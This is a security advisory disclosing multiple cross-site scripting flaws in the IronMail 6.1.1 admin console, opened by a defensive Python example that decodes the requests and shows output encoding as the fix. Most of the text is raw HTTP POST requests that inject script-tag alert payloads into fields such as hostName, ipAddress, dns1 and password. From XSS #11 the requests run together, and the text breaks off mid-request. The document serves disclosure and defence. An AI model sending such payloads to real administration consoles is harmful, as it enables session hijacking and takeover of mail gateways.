Multiple XSS in IronMail

2007.03.30
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial
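
Added example, not part of the advisory: every request in the advisory that follows carries the same marker, `'><script>alert('SIA')</script>`, URL-encoded in one or more form fields. The Python below decodes three of those bodies (shortened, constructed copies) to name the affected fields, then shows type validation and output encoding as the server-side fix; the IPv4 field list and the single-quoted `<input>` rendering are assumptions, not IronMail code.

```python
import html
import ipaddress
from html.parser import HTMLParser
from urllib.parse import parse_qsl

# Constructed samples: form bodies shortened from the advisory's XSS #1, #8
# and #16 requests, with the mail-archive line-wrap spaces removed.
MARKER = "%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E"
SAMPLE_BODIES = {
    "/admin/systemRouting.do": (
        "rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0"
        "&network=" + MARKER + "&netmask=128.0.0.0"
        "&defRouterIp=" + MARKER + "&submit=Submit"
    ),
    "/admin/systemOutOfBand.do": (
        "outOfBand=true&mtu=1500&ipAddress=" + MARKER +
        "&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit"
    ),
    "/admin/mailFirewall_MailRoutingInternal.do": (
        "dtype=INBOUND&input1=" + MARKER + "&input2=&submitValue=Submit"
    ),
}

HTML_META = set("<>\"'")


def tainted_params(body):
    """Names of form fields whose decoded value contains HTML metacharacters."""
    pairs = parse_qsl(body, keep_blank_values=True)
    return sorted(name for name, value in pairs if HTML_META & set(value))


def triage(bodies):
    """Map each endpoint to the fields that carried markup in its request."""
    return {path: tainted_params(body) for path, body in bodies.items()}


# Assumption: these fields hold dotted-quad IPv4 values, as the benign values
# in the advisory's requests suggest.
IPV4_FIELDS = {"network", "netmask", "defRouterIp", "ipAddress", "ipNetMask"}


def is_valid(name, value):
    """Type check for fields with a known format; other fields rely on encoding."""
    if name not in IPV4_FIELDS:
        return True
    try:
        ipaddress.IPv4Address(value)
        return True
    except ValueError:
        return False


def render_input(name, value, escape=True):
    """Echo a value into a single-quoted attribute (assumed console behaviour,
    inferred from the leading '> in the marker). escape=False is the flaw."""
    shown = html.escape(value, quote=True) if escape else value
    return "<input type='text' name='%s' value='%s'>" % (
        html.escape(name, quote=True), shown)


class _Tags(HTMLParser):
    """Collects the start tags an HTML parser actually sees in the output."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    parser = _Tags()
    parser.feed(markup)
    parser.close()
    return parser.tags


if __name__ == "__main__":
    for path, fields in triage(SAMPLE_BODIES).items():
        print(path, "->", ", ".join(fields))
    marker = dict(parse_qsl(SAMPLE_BODIES["/admin/systemOutOfBand.do"]))["ipAddress"]
    print("passes IPv4 check:", is_valid("ipAddress", marker))
    print("raw echo tags    :", tags_in(render_input("ipAddress", marker, escape=False)))
    print("encoded echo tags:", tags_in(render_input("ipAddress", marker)))
```

Fields without a fixed format, such as `input1` or `hostName`, pass `is_valid` here and are covered only by the output encoding, which is why encoding has to be applied at every echo point rather than only where validation is missing.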

Found multiple XSS in IronMail. See attached advisory. Spanish version at http://www.514.es.

Regards,
- J

===============================
- Advisory -
===============================

Title: Multiple XSS in CipherTrust IronMail 6.1.1
Risk: Medium
Date: 20.Feb.2007
Author: Javier Olascoaga <jolascoaga *at* 514.es>
WEB: http://www.514.es/

.: [ INTRO ] :.

IronMail protects enterprise email systems from inbound threats: spam, viruses, or hackers trying to take down or take over the e-mail system. IronMail protects enterprise email systems from outbound threats: regulatory compliance violations, corporate policy violations, or theft ("leakage") of confidential information or intellectual property. IronMail protects enterprise email systems from threats that haven't even been identified yet.

.: [ TECHNICAL DESCRIPTION ] :.

During technical testing of the IronMail mail system, several Cross Site Scripting vulnerabilities were detected in the product's administration console. The XSS found are listed below:

.: [ XSS #1 ] :.
POST https://172.0.0.2:10443/admin/systemRouting.do?method=submit HTTP/1.1
Referer: https://172.0.0.2:10443/admin/systemRouting.do?method=init&isMenuToggled=1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 295
Cache-Control: no-cache
Cookie: CTSecureToken=53DFBE4753D221B2707050E96902E98D_admin; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemRouting.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; tabbedMenuSelected=11; /admin/queueManager.dofirsttimeload=1; /admin/queueManager.do=; JSESSIONID=B227892A258E91419C09469E49AED4D4

rows%5B0%5D.networkId=172.16.0.0&rows%5B0%5D.netmaskId=255.255.0.0&rows%5B1%5D.networkId=192.168.0.0&rows%5B1%5D.netmaskId=255.255.0.0&network=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&netmask=128.0.0.0&defRouterIp=%27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submit=Submit

.: [ XSS #2 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:11:46 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #3 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 341
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=mmail11&domainName=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:26 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #4 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:31 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #5 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 337
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns1=10.1.1.3&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:36 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #6 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 338
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns2=10.1.1.4&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #7 ] :.
POST https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/system_IronMail.do?method=saveNew
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 340
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/system_IronMail.do%3Fmethod%3DsaveNew; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

mtu=1500&hostName=mmail11&domainName=sytes.net&ipAddress=10.1.1.1&ipNetMask=255.255.255.224&defaultRouter=10.1.1.2&dns1=10.1.1.3&dns2=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&dns3=10.1.1.5&ntp1=time.nist.gov&ntp2=bitsy.mit.edu&ntp3=clock.isc.org&timeZone=Europe%2FMadrid&ethernetSetting=autoselect&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:12:48 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #8 ] :.
POST https://172.0.0.2:10443/admin/systemOutOfBand.do?method=saveNew HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemOutOfBand.do?method=getDetail&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemOutOfBand.do%3Fmethod%3DgetDetail%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

outOfBand=true&mtu=1500&ipAddress=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&ethernetSetting=autoselect&ipNetMask=255.255.255.224&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:16 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #9 ] :.
POST https://172.0.0.2:10443/admin/systemBackup.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemBackup.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 146
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemBackup.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

password=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&confirmPassword=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:13:41 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #10 ] :.
POST https://172.0.0.2:10443/admin/systemLicenseManager.do?method=submit HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: https://172.0.0.2:10443/admin/systemLicenseManager.do?method=init&isMenuToggled=1
Accept-Language: es-ES,en-us;q=0.5
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13
Host: 172.0.0.2:10443
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=17; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemLicenseManager.do%3Fmethod%3Dinit%26isMenuToggled%3D1; menusToExpand=%2CConfigurationMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E

license=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&submit=Submit

HTTP/1.0 200 OK
Date: Mon, 19 Feb 2007 10:20:28 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html; charset=utf-8

.: [ XSS #11 ] :.
POST https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/systemWebAdminConfig.do?method=init&isMenu Toggled=1&procId=90 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 1225 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=15; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/systemWebAdminConfig.d o%3Fmethod%3Dinit%26isMenuToggled%3D1%26procId%3D90; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2C; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=90&rows%5B0%5D.attrName=gui_log_level&rows%5B0%5D.attrType=12&row s%5B0%5D.attrValidate=%5BLabelValueBean%5BCRITICAL%2C+1%5D%2C+LabelValue Bean%5BERROR%2C+4%5D%2C+LabelValueBean%5BINFORMATION%2C+5%5D%2C+LabelVal ueBean%5BDETAILED%2C+6%5D%5D&rows%5B0%5D.attrValidateStr=30060003%3A1%2C 30060004%3A4%2C30060005%3A5%2C30060006%3A6&rows%5B0%5D.attrDepends=&rows %5B0%5D.multipleValue=0&rows%5B0%5D.modifyable=true&rows%5B0%5D.attrValu eStrClone=4&rows%5B0%5D.langTagId=2000003&rows%5B0%5D.attrValue=4&rows%5 B1%5D.attrName=gui_timeout&rows%5B1%5D.attrType=2&rows%5B1%5D.attrValida te=%5B1-30%5D&rows%5B1%5D.attrValidateStr=%5B1-30%5D&rows%5B1%5D.attrDep ends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyable=true&rows%5B1%5 D.attrValueStrClone=30&rows%5B1%5D.langTagId=2001014&rows%5B1%5D.attrVal ueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript%3E&rows%5B2%5D. 
attrName=auto_refresh&rows%5B2%5D.attrType=2&rows%5B2%5D.attrValidate=%5 B1-30%5D&rows%5B2%5D.attrValidateStr=%5B1-30%5D&rows%5B2%5D.attrDepends= &rows%5B2%5D.multipleValue=0&rows%5B2%5D.modifyable=true&rows%5B2%5D.att rValueStrClone=4&rows%5B2%5D.langTagId=2001017&rows%5B2%5D.attrValueStr= %27%3E%3Cscript%3Ealert%28%27SIA2%27%29%3C%2Fscript%3E&submitValue=Submi t HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:21:27 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #12 ] :. POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= init&procId=164 Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows %5B0%5D.attrDepends=&rows%5B0%5D.multipleValue=0&rows%5B0%5D.modifyable= 
true&rows%5B0%5D.attrValueStrClone=24&rows%5B0%5D.langTagId=2016401&rows %5B0%5D.attrValueStr=%27%3E%3Cscript%3Ealert%28%27SIA%27%29%3C%2Fscript% 3E&rows%5B1%5D.attrName=sync_results_count&rows%5B1%5D.attrType=2&rows%5 B1%5D.attrValidate=%5B1-500%5D&rows%5B1%5D.attrValidateStr=%5B1-500%5D&r ows%5B1%5D.attrDepends=&rows%5B1%5D.multipleValue=0&rows%5B1%5D.modifyab le=true&rows%5B1%5D.attrValueStrClone=50&rows%5B1%5D.langTagId=2016402&r ows%5B1%5D.attrValueStr=50&rows%5B2%5D.attrName=sync_rules_order&rows%5B 2%5D.attrType=1&rows%5B2%5D.attrValidate=&rows%5B2%5D.attrValidateStr=&r ows%5B2%5D.attrDepends=&rows%5B2%5D.multipleValue=1&rows%5B2%5D.modifyab le=true&rows%5B2%5D.attrValueStrClone=&rows%5B2%5D.langTagId=2016403&row s%5B2%5D.attrValue=&rows%5B3%5D.attrName=ldap_fail_open&rows%5B3%5D.attr Type=5&rows%5B3%5D.attrValidate=&rows%5B3%5D.attrValidateStr=&rows%5B3%5 D.attrDepends=&rows%5B3%5D.multipleValue=0&rows%5B3%5D.modifyable=true&r ows%5B3%5D.attrValueStrClone=1&rows%5B3%5D.langTagId=2016404&rows%5B3%5D .attrValue=true&rows%5B4%5D.attrName=ldap_failure_count&rows%5B4%5D.attr Type=2&rows%5B4%5D.attrValidate=%5B1-50%5D&rows%5B4%5D.attrValidateStr=% 5B1-50%5D&rows%5B4%5D.attrDepends=&rows%5B4%5D.multipleValue=0&rows%5B4% 5D.modifyable=true&rows%5B4%5D.attrValueStrClone=3&rows%5B4%5D.langTagId =2016405&rows%5B4%5D.attrValueStr=3&rows%5B5%5D.attrName=ldap_monitor_in tvl&rows%5B5%5D.attrType=2&rows%5B5%5D.attrValidate=%5B1-1440%5D&rows%5B 5%5D.attrValidateStr=%5B1-1440%5D&rows%5B5%5D.attrDepends=&rows%5B5%5D.m ultipleValue=0&rows%5B5%5D.modifyable=true&rows%5B5%5D.attrValueStrClone =5&rows%5B5%5D.langTagId=2016406&rows%5B5%5D.attrValueStr=5&rows%5B6%5D. 
attrName=ldap_alert_type&rows%5B6%5D.attrType=12&rows%5B6%5D.attrValidat e=%5BLabelValueBean%5BNo+Alert%2C+0%5D%2C+LabelValueBean%5BRESTART%2C+1% 5D%2C+LabelValueBean%5BSHUTDOWN%2C+2%5D%2C+LabelValueBean%5BCRITICAL%2C+ 3%5D%2C+LabelValueBean%5BERROR%2C+4%5D%2C+LabelValueBean%5BWARNING%2C+5% 5D%2C+LabelValueBean%5BNOTIFICATION%2C+6%5D%2C+LabelValueBean%5BINFORMAT ION%2C+7%5D%5D&rows%5B6%5D.attrValidateStr=30060019%3A0%2C30060007%3A1%2 C30060008%3A2%2C30060003%3A3%2C30060004%3A4%2C30060009%3A5%2C30060010%3A 6%2C30060005%3A7&rows%5B6%5D.attrDepends=&rows%5B6%5D.multipleValue=0&ro ws%5B6%5D.modifyable=true&rows%5B6%5D.attrValueStrClone=3&rows%5B6%5D.la ngTagId=2016407&rows%5B6%5D.attrValue=3&rows%5B7%5D.attrName=ldap_route_ aft_masq&rows%5B7%5D.attrType=5&rows%5B7%5D.attrValidate=&rows%5B7%5D.at trValidateStr=&rows%5B7%5D.attrDepends=&rows%5B7%5D.multipleValue=0&rows %5B7%5D.modifyable=true&rows%5B7%5D.attrValueStrClone=0&rows%5B7%5D.lang TagId=2016408&submitValue=Submit HTTP/1.0 200 OK Date: Mon, 19 Feb 2007 10:22:51 GMT Server: Apache Pragma: no-cache Cache-Control: no-store Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close Content-Type: text/html; charset=utf-8 .: [ XSS #13 ] :. 
POST https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Referer: https://172.0.0.2:10443/admin/ldap_ConfigureServiceProperties.do?method= save Accept-Language: es-ES,en-us;q=0.5 Content-Type: application/x-www-form-urlencoded UA-CPU: x86 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Paros/3.2.13 Host: 172.0.0.2:10443 Content-Length: 2840 Connection: Keep-Alive Cache-Control: no-cache Cookie: CTSecureToken=2B59F89A721290CD7E7E0774CDB4A3FE_admin; tabbedMenuSelected=11; itemToHighlight=https%3A//172.0.0.2%3A10443/admin/ldap_ConfigureServiceP roperties.do%3Fmethod%3Dinit%26procId%3D164; menusToExpand=%2CConfigurationMenu%2CWebAdminConfigurationMenu%2CUserAcc ountMenu%2CUserPreferenceMenu%2CAlertManagerMenu%2CMailFirewallMenu%2CLD APConfigurationMenu%2C; /admin/dnsProtection.dofirsttimeload=1; /admin/dnsProtection.do=; JSESSIONID=5A6DABFA0209D0BEC17AF6841DEA184E procId=164&rows%5B0%5D.attrName=sync_time&rows%5B0%5D.attrType=2&rows%5B 0%5D.attrValidate=%5B1-24%5D&rows%5B0%5D.attrValidateStr=%5B1-24%5D&rows 